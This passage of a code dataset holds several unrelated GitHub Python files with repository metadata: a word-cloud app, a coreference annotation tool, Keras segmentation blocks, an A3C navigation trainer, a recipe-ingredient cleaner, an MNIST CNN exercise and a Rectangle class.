StringIO(uploaded_file.getvalue().decode(\"utf-8\")).read()\n files_text += (single_file_text + \" \")\n create_word_cloud(files_text, \"combined Word Cloud\")\n\n\ndef get_individual_clouds(uploaded_files):\n for uploaded_file in uploaded_files:\n single_file_text = \"\"\n # PDFs\n if uploaded_file.name.lower().endswith('.pdf'):\n with fitz.open(stream=uploaded_file.read()) as doc:\n for page in doc.pages():\n extracted_text = page.get_text()\n # If no text was found, assume page was scanned and treat as picture\n if len(extracted_text) == 0:\n pix = page.get_pixmap()\n output = \"outfile.png\"\n pix.save(output)\n single_file_text += (pytesseract.image_to_string('outfile.png').lower() + \" \")\n os.remove(\"./outfile.png\")\n else:\n single_file_text += (extracted_text + \" \")\n # WORD DOCS\n elif uploaded_file.name.lower().endswith(('.doc', '.docx')):\n docx = zipfile.ZipFile(uploaded_file)\n single_file_text = 
docx.read('word/document.xml').decode('utf-8')\n single_file_text = re.sub('<(.|\\n)*?>','',single_file_text).lower()\n # PLAIN TEXT\n else:\n single_file_text = StringIO(uploaded_file.getvalue().decode(\"utf-8\")).read()\n create_word_cloud(single_file_text, uploaded_file.name)\n\n\nif st.button('Generate'):\n if combine_wordcloud:\n get_combined_cloud(uploaded_files)\n else:\n get_individual_clouds(uploaded_files)\n","repo_name":"KayO-GH/Word-Cloud-Generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8265039022","text":"import csv\r\nimport re\r\nimport nltk\r\n\r\ndef arrayprinter(inparr):\r\n inpstr=\"\"\r\n for i in inparr:\r\n inpstr=inpstr+i+\"@@\"\r\n inpstr=inpstr[:len(inpstr)-2]\r\n return inpstr\r\n\r\n#test=[\"[She],[Her]\",\"[Microsoft],[Windows]\"]\r\n#print(arrayprinter(test))\r\n#quit()\r\n\r\n\r\n#fucntion to add all the numbers and stuff\r\ndef unique_worder(ori_text):\r\n split_ori=nltk.word_tokenize(ori_text)\r\n for i in range(len(split_ori)):\r\n curr_word_count=1\r\n if(re.search(\"\\[|\\]|[0-9]+|_\",split_ori[i])==None and re.search(\"[a-zA-Z]\", split_ori[i])!=None):\r\n temp_word=split_ori[i]\r\n for j in range(i,len(split_ori)):\r\n if(temp_word==split_ori[j] and i!=j):\r\n curr_word_count=curr_word_count+1\r\n split_ori[j]=\"[\" + split_ori[j]+\"]\"+str(curr_word_count)\r\n if(curr_word_count!=1 and re.search(\"\\[|\\]|[0-9]+|_\",split_ori[i])==None and re.search(\"[a-zA-Z]\", split_ori[i])!=None ):\r\n split_ori[i]=\"[\" + split_ori[i]+\"]1\"\r\n elif(curr_word_count==1):\r\n split_ori[i]=\"[\" + split_ori[i]+\"]\"\r\n outputter=\"\"\r\n for wordd in split_ori:\r\n outputter=outputter+wordd.strip() + \" \"\r\n return outputter\r\n\r\n\r\n#loading previous progress\r\npreviousindexhandle=open(\"currentindex.txt\",\"r\",encoding=\"utf8\")\r\npreviousindex=previousindexhandle.read()\r\nif(previousindex!=''):\r\n print(\"Previous progress loaded, currently at index:\",int(previousindex))\r\n previousindex=int(previousindex)+1\r\nelse:\r\n print(\"Previous progress not loaded.\")\r\n previousindex=0\r\npreviousindexhandle.close()\r\n\r\n\r\n\r\n\r\n#making an array from the input\r\nall_texts=[]\r\ngapdata=open(\"gapdev_edit.tsv\",\"r\",encoding=\"utf8\")\r\nfor row in csv.reader(gapdata, delimiter='\\t', lineterminator='\\n'):\r\n if(row[0]!='Original Text'):\r\n all_texts.append(row[0])\r\ngapdata.close()\r\n\r\n\r\n#opening the output file\r\ntsvfile= open('annotate.tsv', 'a', newline='')\r\nwriter = csv.writer(tsvfile, delimiter='\\t', lineterminator='\\n')\r\n\r\n\r\n\r\nfor current_id_index in range(previousindex,100): #replace 50 with len(all_texts) to do the rest of the texts (there are 241)\r\n full_annotation=[]\r\n annotation_state=True\r\n mod_word_list=nltk.word_tokenize(unique_worder(all_texts[current_id_index]))\r\n current_unique=unique_worder(all_texts[current_id_index])\r\n while(annotation_state):\r\n print()\r\n print()\r\n print(current_unique)\r\n print('TYPE ? to see the original text:')\r\n print('TYPE THE COREF CHAIN. Type ! to move onto the next text. 
(CTRL+C to exit):')\r\n anno_line = input()\r\n if(anno_line=='!'): #this is the only way you can stop annotating a line\r\n anno_line=True\r\n \r\n writer.writerow([all_texts[current_id_index],current_unique, arrayprinter(full_annotation)])\r\n #updating current progress \r\n currentindex=open(\"currentindex.txt\",\"r+\",encoding=\"utf8\")\r\n currentindex.write(str(current_id_index))\r\n currentindex.close()\r\n break\r\n elif(anno_line==\"?\"):\r\n print()\r\n print(all_texts[current_id_index])\r\n else:\r\n previous_index=-1\r\n anno_test=True\r\n if(re.search(\",\",anno_line)!=None):\r\n for annotation_word in anno_line.split(','):\r\n if(annotation_word not in unique_worder(all_texts[current_id_index])):\r\n print(\"\\033[91m REJECTED. \" + annotation_word + \" is not in the list!\\033[37m\")\r\n anno_test=False\r\n break\r\n elif(annotation_word==\" \"):\r\n print(\"\\033[91m REJECTED. A single whitespace is not a viable option.\\033[37m\")\r\n anno_test=False\r\n break\r\n else:\r\n if(unique_worder(all_texts[current_id_index]).index(annotation_word)>previous_index):\r\n previous_index=unique_worder(all_texts[current_id_index]).index(annotation_word)\r\n else:\r\n print(\"\\033[91m REJECTED. Put your words in the right order.\\033[37m\")\r\n anno_test=False\r\n break\r\n if(anno_test==True):\r\n full_annotation.append(anno_line)\r\n else:\r\n print(\"\\033[91m REJECTED. You need to use commas to separate the words and have at least two words in a chain.\\033[37m\")\r\ntsvfile.close()\r\n\r\n\r\n","repo_name":"cindyliang01/Nouns-Coreference-Annotation","sub_path":"Coreference Annotation/annotate.py","file_name":"annotate.py","file_ext":"py","file_size_in_byte":4585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"34826604738","text":"# Three components for MesNet\n# MFP: Multi-scale Feature Pre-extraction\n# ESCP: Encoder Spatial Cascading Path\n# SE: Squeeze and Excitation block (attention)\n\nfrom keras.layers import core, Input, Conv2D, Dense, MaxPooling2D, UpSampling2D, BatchNormalization, Activation, Concatenate, Multiply, GlobalMaxPooling2D\nfrom keras.models import Model\n\ndef MFP_Block(inputs):\n branch1 = Conv2D(32, 3, padding='same')(inputs)\n branch1 = BatchNormalization()(branch1)\n branch1 = Activation(\"relu\")(branch1)\n\n branch2 = Conv2D(32, 3, dilation_rate=3, padding='same')(inputs)\n branch2 = BatchNormalization()(branch2)\n branch2 = Activation(\"relu\")(branch2)\n\n branch3 = Conv2D(32, 5, padding='same')(inputs)\n branch3 = BatchNormalization()(branch3)\n branch3 = Activation(\"relu\")(branch3)\n\n branch4 = Conv2D(32, 3, padding='same')(inputs)\n branch4 = BatchNormalization()(branch4)\n branch4 = Activation(\"relu\")(branch4)\n branch4 = Conv2D(32, 1, padding='same')(branch4)\n branch4 = BatchNormalization()(branch4)\n branch4 = Activation(\"relu\")(branch4)\n\n branch5 = Conv2D(32, 3, dilation_rate=3, padding='same')(inputs)\n branch5 = BatchNormalization()(branch5)\n branch5 = Activation(\"relu\")(branch5)\n branch5 = Conv2D(32, 3, dilation_rate=5, padding='same')(branch5)\n branch5 = BatchNormalization()(branch5)\n branch5 = Activation(\"relu\")(branch5)\n\n merge = Concatenate()([branch1, branch2, branch3, branch4, branch5])\n return merge\n\n\ndef ESCP(input1, input2, input3):\n # downsampling to the same (h*w)\n input1 = MaxPooling2D((2, 2))(input1)\n input1 = MaxPooling2D((2, 2))(input1)\n input2 = MaxPooling2D((2, 2))(input2)\n\n inputs = Concatenate()([input1, input2, input3])\n conv1 = 
Conv2D(128, 3, padding='same')(inputs)\n conv1 = BatchNormalization()(conv1)\n conv1 = Activation(\"relu\")(conv1)\n\n conv2 = Conv2D(64, 3, dilation_rate=3, padding='same')(conv1)\n conv2 = BatchNormalization()(conv2)\n conv2 = Activation(\"relu\")(conv2)\n\n conv3 = Conv2D(64, 3, dilation_rate=5, padding='same')(conv2)\n conv3 = BatchNormalization()(conv3)\n conv3 = Activation(\"relu\")(conv3)\n\n merge = Concatenate()([conv1, conv2, conv3])\n return merge\n\n# 返回一个概率\ndef SE_Block(feature_map):\n _, w, h, c = feature_map.get_shape()\n inputs = feature_map\n gp = GlobalMaxPooling2D()(inputs)\n dense1 = Dense(c // 16, activation='relu')(gp)\n dense2 = Dense(c, activation='sigmoid')(dense1)\n # dense2 = core.Reshape((1, 1, c))(dense2)\n return dense2\n\n\n","repo_name":"kkkuangzh/Retinal-vessel-segmentation","sub_path":"Blocks.py","file_name":"Blocks.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35594758615","text":"from agent.network import SceneSpecificNetwork, SharedNetwork, ActorCriticLoss\r\nfrom agent.environment import Environment, THORDiscreteEnvironment\r\nimport torch.nn as nn\r\nfrom typing import Dict, Collection\r\nimport signal\r\nimport random\r\nimport torch\r\nimport h5py\r\nfrom agent.replay import ReplayMemory, Sample\r\nfrom collections import namedtuple\r\nimport torch.multiprocessing as mp\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\nimport logging\r\nfrom multiprocessing import Condition\r\n\r\nTrainingSample = namedtuple('TrainingSample', ('state', 'policy', 'value', 'action_taken', 'goal', 'R', 'temporary_difference'))\r\n\r\n\r\n\r\n\r\n\r\nclass TrainingThread(mp.Process):\r\n def __init__(self,\r\n id : int,\r\n network : torch.nn.Module,\r\n saver,\r\n optimizer,\r\n scene : str,\r\n **kwargs):\r\n\r\n super(TrainingThread, self).__init__()\r\n\r\n # Initialize the environment\r\n self.env = None\r\n self.init_args = kwargs\r\n self.scene = scene\r\n self.saver = saver\r\n self.local_backbone_network = SharedNetwork()\r\n self.id = id\r\n\r\n self.master_network = network\r\n self.optimizer = optimizer\r\n\r\n def _sync_network(self):\r\n self.policy_network.load_state_dict(self.master_network.state_dict())\r\n\r\n def _ensure_shared_grads(self):\r\n for param, shared_param in zip(self.policy_network.parameters(), self.master_network.parameters()):\r\n if shared_param.grad is not None:\r\n return \r\n shared_param._grad = param.grad \r\n \r\n def get_action_space_size(self):\r\n return len(self.env.actions)\r\n\r\n def _initialize_thread(self):\r\n h5_file_path = self.init_args.get('h5_file_path')\r\n # self.logger = logging.getLogger('agent')\r\n # self.logger.setLevel(logging.INFO)\r\n self.init_args['h5_file_path'] = lambda scene: h5_file_path.replace('{scene}', scene)\r\n self.env = THORDiscreteEnvironment(self.scene, **self.init_args)\r\n self.gamma : float = self.init_args.get('gamma', 0.99)\r\n self.grad_norm: float = self.init_args.get('grad_norm', 40.0)\r\n entropy_beta : float = self.init_args.get('entropy_beta', 0.01)\r\n self.max_t : int = self.init_args.get('max_t', 5)\r\n self.local_t = 0\r\n self.action_space_size = self.get_action_space_size()\r\n\r\n self.criterion = ActorCriticLoss(entropy_beta)\r\n self.policy_network = nn.Sequential(SharedNetwork(), SceneSpecificNetwork(self.get_action_space_size()))\r\n\r\n # Initialize the episode\r\n self._reset_episode()\r\n self._sync_network()\r\n\r\n\r\n def 
_reset_episode(self):\r\n self.episode_reward = 0\r\n self.episode_length = 0\r\n self.episode_max_q = -np.inf\r\n self.env.reset()\r\n\r\n def _forward_explore(self):\r\n # Does the evaluation end naturally?\r\n is_terminal = False\r\n terminal_end = False\r\n\r\n results = { \"policy\":[], \"value\": []}\r\n rollout_path = {\"state\": [], \"action\": [], \"rewards\": [], \"done\": []}\r\n\r\n # Plays out one game to end or max_t\r\n for t in range(self.max_t):\r\n state = { \r\n \"current\": self.env.render('resnet_features'),\r\n \"goal\": self.env.render_target('resnet_features'),\r\n }\r\n\r\n x_processed = torch.from_numpy(state[\"current\"])\r\n goal_processed = torch.from_numpy(state[\"goal\"])\r\n\r\n (policy, value) = self.policy_network((x_processed, goal_processed,))\r\n\r\n # Store raw network output to use in backprop\r\n results[\"policy\"].append(policy)\r\n results[\"value\"].append(value)\r\n\r\n with torch.no_grad():\r\n (_, action,) = policy.max(0)\r\n action = F.softmax(policy, dim=0).multinomial(1).item()\r\n \r\n policy = policy.data.numpy()\r\n value = value.data.numpy()\r\n \r\n \r\n # Makes the step in the environment\r\n self.env.step(action)\r\n\r\n # Receives the game reward\r\n is_terminal = self.env.is_terminal\r\n\r\n # ad-hoc reward for navigation\r\n reward = 10.0 if is_terminal else -0.01\r\n\r\n # Max episode length\r\n if self.episode_length > 5e3: is_terminal = True\r\n\r\n # Update episode stats\r\n self.episode_length += 1\r\n self.episode_reward += reward\r\n self.episode_max_q = max(self.episode_max_q, np.max(value))\r\n\r\n # clip reward\r\n reward = np.clip(reward, -1, 1)\r\n\r\n # Increase local time\r\n self.local_t += 1\r\n\r\n rollout_path[\"state\"].append(state)\r\n rollout_path[\"action\"].append(action)\r\n rollout_path[\"rewards\"].append(reward)\r\n rollout_path[\"done\"].append(is_terminal)\r\n\r\n if is_terminal:\r\n # TODO: add logging\r\n print('playout finished')\r\n print(f'episode length: {self.episode_length}')\r\n print(f'episode reward: {self.episode_reward}')\r\n print(f'episode max_q: {self.episode_max_q}')\r\n\r\n terminal_end = True\r\n self._reset_episode()\r\n break\r\n\r\n if terminal_end:\r\n return 0.0, results, rollout_path\r\n else:\r\n x_processed = torch.from_numpy(self.env.render('resnet_features'))\r\n goal_processed = torch.from_numpy(self.env.render_target('resnet_features'))\r\n\r\n (_, value) = self.policy_network((x_processed, goal_processed,))\r\n return value.data.item(), results, rollout_path\r\n \r\n def _optimize_path(self, playout_reward: float, results, rollout_path):\r\n policy_batch = []\r\n value_batch = []\r\n action_batch = []\r\n temporary_difference_batch = []\r\n playout_reward_batch = []\r\n\r\n\r\n for i in reversed(range(len(results[\"value\"]))):\r\n reward = rollout_path[\"rewards\"][i]\r\n value = results[\"value\"][i]\r\n action = rollout_path[\"action\"][i]\r\n\r\n playout_reward = reward + self.gamma * playout_reward\r\n temporary_difference = playout_reward - value.data.item()\r\n\r\n policy_batch.append(results['policy'][i])\r\n value_batch.append(results['value'][i])\r\n action_batch.append(action)\r\n temporary_difference_batch.append(temporary_difference)\r\n playout_reward_batch.append(playout_reward)\r\n \r\n policy_batch = torch.stack(policy_batch, 0)\r\n value_batch = torch.stack(value_batch, 0)\r\n action_batch = torch.from_numpy(np.array(action_batch, dtype=np.int64))\r\n temporary_difference_batch = torch.from_numpy(np.array(temporary_difference_batch, 
dtype=np.float32))\r\n playout_reward_batch = torch.from_numpy(np.array(playout_reward_batch, dtype=np.float32))\r\n \r\n # Compute loss\r\n loss = self.criterion.forward(policy_batch, value_batch, action_batch, temporary_difference_batch, playout_reward_batch)\r\n loss = loss.sum()\r\n\r\n loss_value = loss.detach().numpy()\r\n self.optimizer.optimize(loss, \r\n self.policy_network.parameters(), \r\n self.master_network.parameters())\r\n\r\n def run(self, master = None):\r\n signal.signal(signal.SIGINT, signal.SIG_IGN)\r\n print(f'Thread {self.id} ready')\r\n \r\n # We need to silence all errors on new process\r\n h5py._errors.silence_errors()\r\n self._initialize_thread()\r\n \r\n if not master is None:\r\n print(f'Master thread {self.id} started')\r\n else:\r\n print(f'Thread {self.id} started')\r\n\r\n try:\r\n self.env.reset()\r\n while True:\r\n self._sync_network()\r\n # Plays some samples\r\n playout_reward, results, rollout_path = self._forward_explore()\r\n # Train on collected samples\r\n self._optimize_path(playout_reward, results, rollout_path)\r\n \r\n print(f'Step finished {self.optimizer.get_global_step()}')\r\n\r\n # Trigger save or other\r\n self.saver.after_optimization() \r\n pass\r\n except Exception as e:\r\n print(e)\r\n # TODO: add logging\r\n #self.logger.error(e.msg)\r\n raise e","repo_name":"jkulhanek/visual-navigation-agent-pytorch","sub_path":"agent/training_thread.py","file_name":"training_thread.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"3"} +{"seq_id":"10241349815","text":"import re, sys, json\n\nfrom cleanQty import qtyCleaner\nfrom cleanIngred import ingredCleaner\n\nfolders = [\"低脂\",\"生酮\",\"低醣\",\"沙拉\",\"高蛋白\",\"健身\",\"高纖\"]\n\ncntTotal = 0\ncntProcs = 0\nfoodList = []\nfoodFreq = {}\n\nnClean = int(sys.argv[1]) if len(sys.argv) > 1 else 4\nbVerb = bool(sys.argv[2]) if len(sys.argv) > 2 else False\n\ndef load_ID(path):\n ID_file = path\n ID_dict = set()\n try:\n with open(ID_file, \"r\", encoding='utf-8') as f:\n for line in f:\n ID_dict.add(line.replace('\\n', ''))\n except:\n print('No excluding list loaded.')\n return ID_dict\n\nignore_IDs = load_ID('ID_exclude.txt')\nskip_IDs = set()\n\niCleaner = ingredCleaner()\nqCleaner = qtyCleaner()\n\ndef procIngrdent(food_ID, ingreds, bVerb=bVerb, nClean=nClean):\n global foodList, foodFreq, cntTotal\n global iCleaner\n\n x = {} # to avoid change ingreds in for-loop\n for food, qty in ingreds.items(): # 抓出\"食譜\"中的所有 key 和 值\n if nClean:\n nfood = iCleaner.clean(food_ID, food, bVerb=bVerb, nClean=nClean)\n qty_unit = qCleaner.clean(food_ID, qty, bVerb=bVerb)\n else:\n qty_unit = qty\n nfood = food\n\n if iCleaner.checkSkip(food_ID, nfood, qty_unit, bVerb=True) > 0:\n skip_IDs.add(food_ID)\n # continue\n\n # 計算食材出現詞頻\n if nfood in foodList:\n foodFreq[nfood] += 1\n else:\n foodFreq[nfood] = 1\n foodList.append(nfood)\n #print(food) # 所有食材\n x[nfood] = qty_unit\n return x\n\nxf1 = open('./clr-Long.txt', 'w', encoding='utf-8')\nxf2 = open('./clr-Short.txt', 'w', encoding='utf-8')\nfor i in folders:\n with open(f'{i}/{i}.txt', 'r', encoding='utf-8') as f:\n for line in f: # 使用迴圈方式一條一條抓\n data = json.loads(line)\n\n cntTotal += 1\n food_ID = data['food_ID']\n if food_ID not in ignore_IDs:\n data['推讚數'] = qCleaner.parseNumber(data['推讚數'])\n data['瀏覽數'] = qCleaner.parseNumber(data['瀏覽數'])\n data['份數'] = qCleaner.parseNumber(data['份數'])\n data['食譜'] = procIngrdent(food_ID, data['食譜'], bVerb=bVerb, nClean=nClean)\n cntProcs 
+= 1\n xf1.write(json.dumps(data, ensure_ascii=False)+'\\n')\n xf2.write(json.dumps({'id':food_ID, 'ingredents':data['食譜']}, ensure_ascii=False)+'\\n')\nxf1.close()\nxf2.close()\n\nskipA, skipB, skipC = iCleaner.getSkip()\nprint(f\"少許:{len(skipA)}\\nList:{skipA}\\n\\n適量:{len(skipB)}\\nList:{skipB}\\n\\n空白:{len(skipC)}\\nList:{skipC}\\n\")\nprint(f'To Skip:{len(skip_IDs)}\\nList:{skip_IDs}')\n\nprint(len(foodList)) # total number of distinct ingredients\nprint(cntTotal, cntProcs) # total recipes read vs. recipes processed\n\n\n# turn the word frequencies into a table\nimport pandas as pd\ndf = pd.DataFrame.from_dict(foodFreq, orient='index', columns=['詞頻']) # convert the dict into a DataFrame\n\n# df = df.sort_index(ascending=False)\n# df.to_csv(\"照食材順序排的food_frequency_2.0.csv\", encoding=\"utf-8-sig\")\n\ndf = df.sort_values(by='詞頻', ascending=False) # sort by the '詞頻' (frequency) column from largest to smallest (ascending=False)\ndf.to_csv(\"照詞頻順序排的food_frequency_2.0.csv\", encoding=\"utf-8-sig\")\n","repo_name":"peter81725/Food-Fighter","sub_path":"recipeETL/Crawler/wordCount.py","file_name":"wordCount.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"6728260922","text":"\"\"\" Using convolutional net on MNIST dataset of handwritten digit\n(http://yann.lecun.com/exdb/mnist/)\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport os\nimport time\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport utils\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nN_CLASSES = 10\n\n# Step 1: Read in data\n# using TF Learn's built in function to load MNIST data to the folder data/mnist\nmnist = input_data.read_data_sets(\"datasets/mnist\", one_hot=True)\n\n# Step 2: Define parameters for the model\nLEARNING_RATE = 0.001\nBATCH_SIZE = 128\nSKIP_STEP = 10\nDROPOUT = 0.75\nN_EPOCHS = 5\n\n# Step 3: create placeholders for features and labels\n# each image in the MNIST data is of shape 28*28 = 784\n# therefore, each image is represented with a 1x784 tensor\n# We'll be doing dropout for hidden layer so we'll need a placeholder\n# for the dropout probability too\n# Use None for shape so we can change the batch_size once we've built the graph\nwith tf.name_scope('Data'):\n X = tf.placeholder(tf.float32, [None, 784], name=\"X_placeholder\")\n Y = tf.placeholder(tf.float32, [None, 10], name=\"Y_placeholder\")\n\ndropout = tf.placeholder(tf.float32, name='dropout')\nglobal_step = tf.Variable(0, dtype=tf.int32, trainable=False, name='global_step')\n\n# Step 4 + 5: create weights + do inference\n# the model is conv -> relu -> pool -> conv -> relu -> pool -> fully connected -> softmax\n\nutils.make_dir('checkpoints')\nutils.make_dir('checkpoints/CNN')\n\nwith tf.variable_scope('conv1') as scope:\n # first, reshape the image to [BATCH_SIZE, 28, 28, 1] to make it work with tf.nn.conv2d\n # use the dynamic dimension -1\n images = tf.reshape(X, shape=[-1, 28, 28, 1])\n\n # TO DO\n\n # create kernel variable of dimension [5, 5, 1, 32]\n # use tf.truncated_normal_initializer()\n kernel = tf.get_variable('kernel', [5, 5, 1, 32],\n initializer=tf.truncated_normal_initializer())\n\n # TO DO\n\n # create biases variable of dimension [32]\n # use tf.constant_initializer(0.0)\n biases = tf.get_variable('biases', [32],\n initializer=tf.random_normal_initializer())\n\n # TO DO\n\n # apply tf.nn.conv2d. 
strides [1, 1, 1, 1], padding is 'SAME'\n conv = tf.nn.conv2d(images, kernel, strides=[1, 1, 1, 1], padding='SAME')\n\n # TO DO\n\n # apply relu on the sum of convolution output and biases\n conv1 = tf.nn.relu(conv + biases, name=scope.name)\n\n # output is of dimension BATCH_SIZE x 28 x 28 x 32\n\nwith tf.variable_scope('pool1') as scope:\n # apply max pool with ksize [1, 2, 2, 1], and strides [1, 2, 2, 1], padding 'SAME'\n pool1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],\n padding='SAME')\n # TO DO\n\n # output is of dimension BATCH_SIZE x 14 x 14 x 32\n\nwith tf.variable_scope('conv2') as scope:\n # similar to conv1, except kernel now is of the size 5 x 5 x 32 x 64\n kernel = tf.get_variable('kernels', [5, 5, 32, 64],\n initializer=tf.truncated_normal_initializer())\n biases = tf.get_variable('biases', [64],\n initializer=tf.random_normal_initializer())\n conv = tf.nn.conv2d(pool1, kernel, strides=[1, 1, 1, 1], padding='SAME')\n conv2 = tf.nn.relu(conv + biases, name=scope.name)\n\n # output is of dimension BATCH_SIZE x 14 x 14 x 64\n\nwith tf.variable_scope('pool2') as scope:\n # similar to pool1\n pool2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],\n padding='SAME')\n\n # output is of dimension BATCH_SIZE x 7 x 7 x 64\n\nwith tf.variable_scope('fc') as scope:\n # use weight of dimension 7 * 7 * 64 x 1024\n input_features = 7 * 7 * 64\n\n # create weights and biases\n\n # TO DO\n w = tf.get_variable('weights', [input_features, 1024],\n initializer=tf.truncated_normal_initializer())\n b = tf.get_variable('biases', [1024],\n initializer=tf.constant_initializer(0.0))\n\n # reshape pool2 to 2 dimensional\n pool2 = tf.reshape(pool2, [-1, input_features])\n\n # apply relu on matmul of pool2 and w + b\n fc = tf.nn.relu(tf.matmul(pool2, w) + b, name='relu')\n\n # TO DO\n\n # apply dropout\n fc = tf.nn.dropout(fc, dropout, name='relu_dropout')\n\nwith tf.variable_scope('softmax_linear') as scope:\n # this you should know. 
get logits without softmax\n # you need to create weights and biases\n\n # TO DO\n w = tf.get_variable('weights', [1024, N_CLASSES],\n initializer=tf.truncated_normal_initializer())\n b = tf.get_variable('biases', [N_CLASSES],\n initializer=tf.random_normal_initializer())\n logits = tf.matmul(fc, w) + b\n\n# Step 6: define loss function\n# use softmax cross entropy with logits as the loss function\n# compute mean cross entropy, softmax is applied internally\nwith tf.name_scope('Loss'):\n # you should know how to do this too\n\n # TO DO\n entropy = tf.nn.softmax_cross_entropy_with_logits_v2(labels=Y, logits=logits)\n loss = tf.reduce_mean(entropy, name='loss')\n\n# Step 7: define training op\n# using gradient descent with learning rate of LEARNING_RATE to minimize cost\n# don't forgot to pass in global_step\n\n# TO DO\nwith tf.name_scope('Optimizer'):\n optimizer = tf.train.AdamOptimizer(LEARNING_RATE).minimize(loss, global_step=global_step)\n\n# evaluation the model\nwith tf.name_scope(\"Evaluation\"):\n preds = tf.nn.softmax(logits)\n correct_preds = tf.equal(tf.argmax(preds, 1), tf.argmax(Y, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_preds, tf.float32))\n\n# Create a summary to monitor loss\ntf.summary.scalar(\"accuracy\", accuracy)\ntf.summary.scalar(\"loss\", loss)\n\n# merge summaries per collection\ntraining_summary = tf.summary.merge_all()\n\nwith tf.Session() as sess:\n writer_train = tf.summary.FileWriter('./graphs/CNN', sess.graph)\n\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n # You have to create folders to store checkpoints\n ckpt = tf.train.get_checkpoint_state(os.path.dirname('checkpoints/CNN/'))\n # if that checkpoint exists, restore from checkpoint\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n\n initial_step = global_step.eval()\n\n start_time = time.time()\n n_batches = int(mnist.train.num_examples / BATCH_SIZE)\n\n total_loss = 0.0\n for index in range(initial_step, n_batches * N_EPOCHS): # train the model n_epochs times\n X_batch, Y_batch = mnist.train.next_batch(BATCH_SIZE)\n _, loss_batch, train_summ = sess.run([optimizer, loss, training_summary],\n feed_dict={X: X_batch, Y: Y_batch, dropout: DROPOUT})\n writer_train.add_summary(train_summ, index)\n total_loss += loss_batch\n if (index + 1) % SKIP_STEP == 0:\n print('Average loss at step {}: {}'.format(index + 1, total_loss / SKIP_STEP))\n total_loss = 0.0\n saver.save(sess, 'checkpoints/CNN/', index + 1)\n\n print(\"Optimization Finished!\") # should be around 0.35 after 25 epochs\n print(\"Total time: {0} seconds\".format(time.time() - start_time))\n\n # Test model calculate accuracy\n print('Accuracy on test data:', accuracy.eval(\n {X: mnist.test.images, Y: mnist.test.labels, dropout: 1.0}))\n print('Run the command line: tensorboard --logdir=./graphs/CNN')\n","repo_name":"st2yang/5525MachineLearning","sub_path":"HW3/code/ConvNetTemplate.py","file_name":"ConvNetTemplate.py","file_ext":"py","file_size_in_byte":7494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3852796189","text":"#!/usr/bin/python3\n\"\"\" Rectangle Class Module \"\"\"\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\" Rectangle Class, Subclass of Class Base \"\"\"\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" Initializes a rectangle with size attributes \"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n @property\n 
def width(self):\n \"\"\" Returns width of rectangle \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" Sets width of rectangle \"\"\"\n if not type(value) == int:\n raise TypeError(\"width must be an integer\")\n elif value <= 0:\n raise ValueError(\"width must be > 0\")\n else:\n self.__width = value\n\n @property\n def height(self):\n \"\"\" Returns height of rectangle \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" Sets height of rectangle \"\"\"\n if not type(value) == int:\n raise TypeError(\"height must be an integer\")\n elif value <= 0:\n raise ValueError(\"height must be > 0\")\n else:\n self.__height = value\n\n @property\n def x(self):\n \"\"\" Returns x \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" Sets x \"\"\"\n if not type(value) == int:\n raise TypeError(\"x must be an integer\")\n elif value < 0:\n raise ValueError(\"x must be >= 0\")\n else:\n self.__x = value\n\n @property\n def y(self):\n \"\"\" Returns y \"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\" Sets y \"\"\"\n if not type(value) == int:\n raise TypeError(\"y must be an integer\")\n elif value < 0:\n raise ValueError(\"y must be >= 0\")\n else:\n self.__y = value\n\n def area(self):\n \"\"\" Returns area of rectangle \"\"\"\n return self.__width * self.__height\n\n def display(self):\n \"\"\" Prints the rectangle to stdout using # \"\"\"\n for i in range(self.__y):\n print(\"\")\n for i in range(self.__height):\n print(\" \" * self.__x + \"#\" * self.__width)\n\n def __str__(self):\n \"\"\" Returns a string representation of the Rectangle class \"\"\"\n return \"[{}] ({}) {}/{} - {}/{}\".format(type(self).__name__, self.id,\n self.__x, self.__y,\n self.__width, self.__height)\n\n def update(self, *args, **kwargs):\n \"\"\" Assigns an argument to each attribute \"\"\"\n if args and len(args) != 0:\n for i, arg in enumerate(args):\n if i == 0:\n self.id = arg\n if i == 1:\n self.width = arg\n if i == 2:\n self.height = arg\n if i == 3:\n self.x = arg\n if i == 4:\n self.y = arg\n else:\n if kwargs:\n for key, arg in kwargs.items():\n if key == \"id\":\n self.id = arg\n if key == \"width\":\n self.width = arg\n if key == \"height\":\n self.height = arg\n if key == \"x\":\n self.x = arg\n if key == \"y\":\n self.y = arg\n\n def to_dictionary(self):\n \"\"\" Returns a dictionary representation of the Rectangle Class \"\"\"\n class_dict = {'id': self.id, 'width': self.width,\n 'height': self.height, 'x': self.x, 'y': self.y}\n return 